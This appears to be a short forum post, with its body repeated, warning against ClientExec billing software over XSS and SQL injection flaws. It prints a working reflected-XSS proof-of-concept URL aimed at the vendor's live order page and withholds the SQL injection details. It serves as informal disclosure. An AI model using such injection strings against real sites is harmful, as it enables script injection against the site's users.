After looking around, I discovered why not to use clientexec. Its because of its huge XSS and a few SQLi injections that are possible.
XSS: https://www.clientexec.com/members//order.php?step=subsearch&tld=false&name=1')%7B%7D%7Dalert('xss%20-%20you%20really%20need%20to%20fix%20this%20clientexec');function+x()%7Bif('
I won't post the SQLi's here, but I discovered this at localhost.re
Thoughts?
XSS: https://www.clientexec.com/members//order.php?step=subsearch&tld=false&name=1')%7B%7D%7Dalert('xss%20-%20you%20really%20need%20to%20fix%20this%20clientexec');function+x()%7Bif('
I won't post the SQLi's here, but I discovered this at localhost.re
Thoughts?